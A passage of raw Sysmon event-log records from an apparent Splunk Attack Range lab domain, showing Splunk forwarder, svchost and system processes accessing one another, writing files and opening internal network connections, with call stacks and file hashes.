Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080609Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:31.458{2FDD8D40-B157-615A-2601-00000000FD01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000080608Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:29.102{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49974-false10.0.1.12-8089- 23542300x800000000000000080640Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.645{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A960377D88D0F04A817CB07B24933FC,SHA256=E79CC9D7911FDC6460F2541940C9A40F2C5E388728D493E74EFAED6DBB14ED8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102780Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:32.108{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C89287E0C6454712492A3C0DDF613ABB,SHA256=0C4FCF3EB7DDA56A0ED868D3C034AA87D7C1BAF73F4E7B78D2A85DF19FF824E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080639Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.473{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=017B48EBE099F18A89F3ABED3A51EBBB,SHA256=54A57991C3304058AF1FD5974A808E5CB0A6215442BC484F545328046EFE7902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080638Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.473{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88C6FBC07CDF2178D2265B8876DBB7BA,SHA256=BB4FDE5D6A2BCC87D3A051776D6550D0878FA98A23027C640C7844B3A3931C30,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080637Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.191{2FDD8D40-B158-615A-2701-00000000FD01}11601892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000080636Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:29.743{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49975-false10.0.1.12-8000- 10341000x800000000000000080635Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B158-615A-2701-00000000FD01}1160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080634Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080633Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080632Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080631Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080630Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080629Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080628Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080627Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080626Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080625Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B158-615A-2701-00000000FD01}1160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080624Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.035{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B158-615A-2701-00000000FD01}1160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080623Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:32.037{2FDD8D40-B158-615A-2701-00000000FD01}1160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000102779Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:32.045{58E9C193-ACA7-615A-1100-00000000FC01}3601500C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000102778Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:32.045{58E9C193-ACA7-615A-1100-00000000FC01}3601500C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000102777Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:32.014{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=62DC105C878727A5459A7BC188C8AD61,SHA256=4FDC2EB348AC00A7A5CFAA5BC67139F89B08B6A448078518B259133A5DCF4476,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080654Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.723{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CABA839AB51CADFD224A44410DE62B28,SHA256=95245C25B4832EC967A998E41E45194D3939008CB181B4C82623B1351E9BA9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102781Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:46:33.123{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B612ADB1B2F622CCA716C0D01DA0AD1B,SHA256=E362750BCA64CDE41A6A7FB4152241BFCF76A75AB2956784EF01A01AA041925F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080653Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B159-615A-2801-00000000FD01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080652Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080651Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080650Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:46:33.145{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080649Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 